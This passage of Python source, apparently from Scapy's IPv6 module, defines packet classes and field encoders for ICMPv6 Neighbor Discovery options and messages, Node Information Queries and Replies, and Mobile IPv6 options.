1), ByteField("len", 1), MACField("lladdr", ETHER_ANY)] def mysummary(self): return self.sprintf("%name% %lladdr%") class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" type = 2 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ByteField("type", 3), ByteField("len", 4), ByteField("prefixlen", None), BitField("L", 1, 1), BitField("A", 1, 1), BitField("R", 0, 1), BitField("res1", 0, 5), XIntField("validlifetime", 0xffffffff), XIntField("preferredlifetime", 0xffffffff), XIntField("res2", 0x00000000), IP6Field("prefix", "::")] def mysummary(self): return self.sprintf("%name% %prefix%/%prefixlen% " "On-link %L% Autonomous Address %A% " "Router Address %R%") # TODO: We should also limit the size of included packet to something # like (initiallen - 40 - 2) class TruncPktLenField(PacketLenField): __slots__ = ["cur_shift"] def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501 PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501 self.cur_shift = cur_shift def getfield(self, pkt, s): tmp_len = self.length_from(pkt) i = self.m2i(pkt, s[:tmp_len]) return s[tmp_len:], i def m2i(self, pkt, m): s = None try: # It can happen we have sth shorter than 40 bytes s = self.cls(m) except Exception: return conf.raw_layer(m) return s def i2m(self, pkt, x): s = raw(x) tmp_len = len(s) r = (tmp_len + self.cur_shift) % 8 tmp_len = tmp_len - r return s[:tmp_len] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="pkt", fmt="B", adjust=lambda pkt, x:(x + 8) // 8), StrFixedLenField("res", b"\x00" * 6, 6), TruncPktLenField("pkt", b"", IPv6, 8, length_from=lambda pkt: 8 * pkt.len - 8)] # See which value should be used for default MTU instead of 1280 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - MTU" fields_desc = [ByteField("type", 5), ByteField("len", 1), XShortField("res", 0), IntField("mtu", 1280)] def mysummary(self): return self.sprintf("%name% %mtu%") class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" fields_desc = [ByteField("type", 6), ByteField("len", 1), ByteField("shortcutlim", 40), # XXX ByteField("res1", 0), IntField("res2", 0)] class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Interval Advertisement" fields_desc = [ByteField("type", 7), ByteField("len", 1), ShortField("res", 0), IntField("advint", 0)] def mysummary(self): return self.sprintf("%name% %advint% milliseconds") class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Home Agent Information" fields_desc = [ByteField("type", 8), ByteField("len", 1), ShortField("res", 0), ShortField("pref", 0), ShortField("lifetime", 1)] def mysummary(self): return self.sprintf("%name% %pref% %lifetime% seconds") # type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" fields_desc = [ByteField("type", 17), ByteField("len", 3), ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 2: "New Care-Of Address", 3: "NAR's IP address"}), ByteField("plen", 64), IntField("res", 0), IP6Field("addr", "::")] class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 18), ByteField("len", 3), ByteField("optcode", 0), ByteField("plen", 64), IntField("res", 0), IP6Field("prefix", "::")] _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1: "LLA for the new AP", 2: "LLA of the MN", 3: "LLA of the NAR", 4: "LLA of the src of TrSolPr or PrRtAdv msg", 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 6: "No preifx info available for AP identified by the LLA", # noqa: E501 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 19), ByteField("len", 1), ByteEnumField("optcode", 0, _rfc4068_lla_optcode), MACField("lla", ETHER_ANY)] # We only support ethernet class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 name = "ICMPv6 Neighbor Discovery - MAP Option" fields_desc = [ByteField("type", 23), ByteField("len", 3), BitField("dist", 1, 4), BitField("pref", 15, 4), # highest availability BitField("R", 1, 1), BitField("res", 0, 7), IntField("validlifetime", 0xffffffff), IP6Field("addr", "::")] class _IP6PrefixField(IP6Field): __slots__ = ["length_from"] def __init__(self, name, default): IP6Field.__init__(self, name, default) self.length_from = lambda pkt: 8 * (pkt.len - 1) def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) def getfield(self, pkt, s): tmp_len = self.length_from(pkt) p = s[:tmp_len] if tmp_len < 16: p += b'\x00' * (16 - tmp_len) return s[tmp_len:], self.m2i(pkt, p) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def i2m(self, pkt, x): tmp_len = pkt.len if x is None: x = "::" if tmp_len is None: tmp_len = 1 x = inet_pton(socket.AF_INET6, x) if tmp_len is None: return x if tmp_len in [0, 1]: return b"" if tmp_len in [2, 3]: return x[:8 * (tmp_len - 1)] return x + b'\x00' * 8 * (tmp_len - 3) class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" fields_desc = [ByteField("type", 24), FieldLenField("len", None, length_of="prefix", fmt="B", adjust=lambda pkt, x: x // 8 + 1), ByteField("plen", None), BitField("res1", 0, 3), BitEnumField("prf", 0, 2, icmp6ndraprefs), BitField("res2", 0, 3), IntField("rtlifetime", 0xffffffff), _IP6PrefixField("prefix", None)] def mysummary(self): return self.sprintf("%name% %prefix%/%plen% Preference %prf%") class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" fields_desc = [ByteField("type", 25), FieldLenField("len", None, count_of="dns", fmt="B", adjust=lambda pkt, x: 2 * x + 1), ShortField("res", None), IntField("lifetime", 0xffffffff), IP6ListField("dns", [], length_from=lambda pkt: 8 * (pkt.len - 1))] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.dns)) class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" fields_desc = [ByteField("type", 26), ByteField("len", 1), BitField("res", 0, 48)] # As required in Sect 8. of RFC 3315, Domain Names must be encoded as # described in section 3.1 of RFC 1035 # XXX Label should be at most 63 octets in length : we do not enforce it # Total length of domain should be 255 : we do not enforce it either class DomainNameListField(StrLenField): __slots__ = ["padded"] islist = 1 padded_unit = 8 def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 self.padded = padded StrLenField.__init__(self, name, default, fld, length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def m2i(self, pkt, x): x = plain_str(x) # Decode bytes to string res = [] while x: # Get a name until \x00 is reached cur = [] while x and ord(x[0]) != 0: tmp_len = ord(x[0]) cur.append(x[1:tmp_len + 1]) x = x[tmp_len + 1:] if self.padded: # Discard following \x00 in padded mode if len(cur): res.append(".".join(cur) + ".") else: # Store the current name res.append(".".join(cur) + ".") if x and ord(x[0]) == 0: x = x[1:] return res def i2m(self, pkt, x): def conditionalTrailingDot(z): if z and orb(z[-1]) == 0: return z return z + b'\x00' # Build the encode names tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) # In padded mode, add some \x00 bytes if self.padded and not len(ret_string) % self.padded_unit == 0: ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 return ret_string class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" fields_desc = [ByteField("type", 31), FieldLenField("len", None, length_of="searchlist", fmt="B", adjust=lambda pkt, x: 1 + x // 8), ShortField("res", None), IntField("lifetime", 0xffffffff), DomainNameListField("searchlist", [], length_from=lambda pkt: 8 * pkt.len - 8, padded=True) ] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.searchlist)) # End of ICMPv6 Neighbor Discovery Options. class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Solicitation" fields_desc = [ByteEnumField("type", 133, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Advertisement" fields_desc = [ByteEnumField("type", 134, icmp6types), ByteField("code", 0), XShortField("cksum", None), ByteField("chlim", 0), BitField("M", 0, 1), BitField("O", 0, 1), BitField("H", 0, 1), BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 BitField("P", 0, 1), BitField("res", 0, 2), ShortField("routerlifetime", 1800), IntField("reachabletime", 0), IntField("retranstimer", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def answers(self, other): return isinstance(other, ICMPv6ND_RS) def mysummary(self): return self.sprintf("%name% Lifetime %routerlifetime% " "Hop Limit %chlim% Preference %prf% " "Managed %M% Other %O% Home %H%") class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" fields_desc = [ByteEnumField("type", 135, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" fields_desc = [ByteEnumField("type", 136, icmp6types), ByteField("code", 0), XShortField("cksum", None), BitField("R", 1, 1), BitField("S", 0, 1), BitField("O", 1, 1), XBitField("res", 0, 29), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() def answers(self, other): return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt # associated possible options : target link-layer option, Redirected header class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Redirect" fields_desc = [ByteEnumField("type", 137, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("res", 0), IP6Field("tgt", "::"), IP6Field("dst", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # ICMPv6 Inverse Neighbor Discovery (RFC 3122) # class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" fields_desc = [ByteField("type", 9), FieldLenField("len", None, count_of="addrlist", fmt="B", adjust=lambda pkt, x: 2 * x + 1), StrFixedLenField("res", b"\x00" * 6, 6), IP6ListField("addrlist", [], length_from=lambda pkt: 8 * (pkt.len - 1))] class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" type = 10 # RFC3122 # Options requises : source lladdr et target lladdr # Autres options valides : source address list, MTU # - Comme precise dans le document, il serait bien de prendre l'adresse L2 # demandee dans l'option requise target lladdr et l'utiliser au niveau # de l'adresse destination ethernet si aucune adresse n'est precisee # - ca semble pas forcement pratique si l'utilisateur doit preciser toutes # les options. # Ether() must use the target lladdr as destination class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Solicitation" fields_desc = [ByteEnumField("type", 141, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # Options requises : target lladdr, target address list # Autres options valides : MTU class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Advertisement" fields_desc = [ByteEnumField("type", 142, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} ############################################################################### # ICMPv6 Node Information Queries (RFC 4620) ############################################################################### # [ ] Add automatic destination address computation using computeNIGroupAddr # in IPv6 class (Scapy6 modification when integrated) if : # - it is not provided # - upper layer is ICMPv6NIQueryName() with a valid value # [ ] Try to be liberal in what we accept as internal values for _explicit_ # DNS elements provided by users. Any string should be considered # valid and kept like it has been provided. At the moment, i2repr() will # crash on many inputs # [ ] Do the documentation # [ ] Add regression tests # [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 # [ ] Check if there are differences between different stacks. Among *BSD, # with others. # [ ] Deal with flags in a consistent way. # [ ] Implement compression in names2dnsrepr() and decompresiion in # dnsrepr2names(). Should be deactivable. icmp6_niqtypes = {0: "NOOP", 2: "Node Name", 3: "IPv6 Address", 4: "IPv4 Address"} class _ICMPv6NIHashret: def hashret(self): return bytes_encode(self.nonce) class _ICMPv6NIAnswers: def answers(self, other): return self.nonce == other.nonce # Buggy; always returns the same value during a session class NonceField(StrFixedLenField): def __init__(self, name, default=None): StrFixedLenField.__init__(self, name, default, 8) if default is None: self.default = self.randval() @conf.commands.register def computeNIGroupAddr(name): """Compute the NI group Address. Can take a FQDN as input parameter""" name = name.lower().split(".")[0] record = chr(len(name)) + name h = md5(record.encode("utf8")) h = h.digest() addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) return addr # Here is the deal. First, that protocol is a piece of shit. Then, we # provide 4 classes for the different kinds of Requests (one for every # valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same # data field class that is made to be smart by guessing the specific # type of value provided : # # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, # if not overridden by user # - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, # if not overridden # - Name in the other cases: code is set to 0, if not overridden by user # # Internal storage, is not only the value, but the a pair providing # the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) # # Note : I merged getfield() and m2i(). m2i() should not be called # directly anyway. Same remark for addfield() and i2m() # # -- arno # "The type of information present in the Data field of a query is # declared by the ICMP Code, whereas the type of information in a # Reply is determined by the Qtype" def names2dnsrepr(x): """ Take as input a list of DNS names or a single DNS name and encode it in DNS format (with possible compression) If a string that is already a DNS name in DNS format is passed, it is returned unmodified. Result is a string. !!! At the moment, compression is not implemented !!! """ if isinstance(x, bytes): if x and x[-1:] == b'\x00': # stupid heuristic return x x = [x] res = [] for n in x: termin = b"\x00" if n.count(b'.') == 0: # single-component gets one more termin += b'\x00' n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin res.append(n) return b"".join(res) def dnsrepr2names(x): """ Take as input a DNS encoded string (possibly compressed) and returns a list of DNS names contained in it. If provided string is already in printable format (does not end with a null character, a one element list is returned). Result is a list. """ res = [] cur = b"" while x: tmp_len = orb(x[0]) x = x[1:] if not tmp_len: if cur and cur[-1:] == b'.': cur = cur[:-1] res.append(cur) cur = b"" if x and orb(x[0]) == 0: # single component x = x[1:] continue if tmp_len & 0xc0: # XXX TODO : work on that -- arno raise Exception("DNS message can't be compressed at this point!") cur += x[:tmp_len] + b"." x = x[tmp_len:] return res class NIQueryDataField(StrField): def __init__(self, name, default): StrField.__init__(self, name, default) def i2h(self, pkt, x): if x is None: return x t, val = x if t == 1: val = dnsrepr2names(val)[0] return val def h2i(self, pkt, x): if x is tuple and isinstance(x[0], int): return x # Try IPv6 try: inet_pton(socket.AF_INET6, x.decode()) return (0, x.decode()) except Exception: pass # Try IPv4 try: inet_pton(socket.AF_INET, x.decode()) return (2, x.decode()) except Exception: pass # Try DNS if x is None: x = b"" x = names2dnsrepr(x) return (1, x) def i2repr(self, pkt, x): t, val = x if t == 1: # DNS Name # we don't use dnsrepr2names() to deal with # possible weird data extracted info res = [] while val: tmp_len = orb(val[0]) val = val[1:] if tmp_len == 0: break res.append(plain_str(val[:tmp_len]) + ".") val = val[tmp_len:] tmp = "".join(res) if tmp and tmp[-1] == '.': tmp = tmp[:-1] return tmp return repr(val) def getfield(self, pkt, s): qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") else: code = getattr(pkt, "code") if code == 0: # IPv6 Addr return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) elif code == 2: # IPv4 Addr return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) else: # Name or Unknown return b"", (1, s) def addfield(self, pkt, s, val): if ((isinstance(val, tuple) and val[1] is None) or val is None): val = (1, b"") t = val[0] if t == 1: return s + val[1] elif t == 0: return s + inet_pton(socket.AF_INET6, val[1]) else: return s + inet_pton(socket.AF_INET, val[1]) class NIQueryCodeField(ByteEnumField): def i2m(self, pkt, x): if x is None: d = pkt.getfieldval("data") if d is None: return 1 elif d[0] == 0: # IPv6 address return 0 elif d[0] == 1: # Name return 1 elif d[0] == 2: # IPv4 address return 2 else: return 1 return x _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} # _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", # 8: "Link-local addresses", 16: "Site-local addresses", # 32: "Global addresses" } # "This NI type has no defined flags and never has a Data Field". Used # to know if the destination is up and implements NI protocol. class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Query - NOOP Query" fields_desc = [ByteEnumField("type", 139, icmp6types), NIQueryCodeField("code", None, _niquery_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIQueryDataField("data", None)] class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Name Query" qtype = 2 # We ask for the IPv6 address of the peer class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Address Query" qtype = 3 flags = 0x3E class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv4 Address Query" qtype = 4 _nireply_code = {0: "Successful Reply", 1: "Response Refusal", 3: "Unknown query type"} _nireply_flags = {1: "Reply set incomplete", 2: "All unicast addresses", 4: "IPv4 addresses", 8: "Link-local addresses", 16: "Site-local addresses", 32: "Global addresses"} # Internal repr is one of those : # (0, "some string") : unknown qtype value are mapped to that one # (3, [ (ttl, ip6), ... ]) # (4, [ (ttl, ip4), ... ]) # (2, [ttl, dns_names]) : dns_names is one string that contains # all the DNS names. Internally it is kept ready to be sent # (undissected). i2repr() decode it for user. This is to # make build after dissection bijective. # # I also merged getfield() and m2i(), and addfield() and i2m(). class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t, val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if not isinstance(x, tuple): if pkt is not None: qtype = pkt.qtype else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if isinstance(x, (str, bytes)): # listify the string x = [x] if isinstance(x, list): x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 if x and isinstance(x[0], six.integer_types): ttl = x[0] names = x[1:] else: ttl = 0 names = x return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if not isinstance(x, list): x = [x] # User directly provided an IP, instead of list def fixvalue(x): # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead if not isinstance(x, tuple): x = (0, x) # Decode bytes if six.PY3 and isinstance(x[1], bytes): x = (x[0], x[1].decode()) return x return (qtype, [fixvalue(d) for d in x]) return (qtype, x) def addfield(self, pkt, s, val): t, tmp = val if tmp is None: tmp = b"" if t == 2: ttl, dnsstr = tmp return s + struct.pack("!I", ttl) + dnsstr elif t == 3: return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 elif t == 4: return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, b"") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") elif qtype == 2: if len(s) < 4: return s, (0, b"") ttl = struct.unpack("!I", s[:4])[0] return b"", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return b"", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if isinstance(x, tuple) and len(x) == 2: t, val = x if t == 2: # DNS names ttl, tmp_len = val tmp_len = dnsrepr2names(tmp_len) names_list = (plain_str(name) for name in tmp_len) return "ttl:%d %s" % (ttl, ",".join(names_list)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = orb(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = orb(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# # Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ByteEnumField("type", 144, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ByteEnumField("type", 145, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0)] def _hashret(self): return struct.pack("!H", self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), XBitField("res", 0, 14)] def hashret(self): return struct.pack("!H", self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = {2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init (RFC4866)", 16: "Care-of Test (RFC4866)"} class _MIP6OptAlign(Packet): """ Mobile IPv6 options have alignment requirements of the form x*n+y. This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. (x=0 and y=0 are used when no alignment is required)""" __slots__ = ["x", "y"] def alignment_delta(self, curpos): x = self.x y = self.y if x == 0 and y == 0: return 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class MIP6OptBRAdvice(_MIP6OptAlign): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::")] x = 8 y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::")] x = 8 y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY)] # Only support ethernet x = 0 y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust=lambda pkt, x: x + 1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from=lambda pkt: pkt.olen - 1)] x = 0 y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too 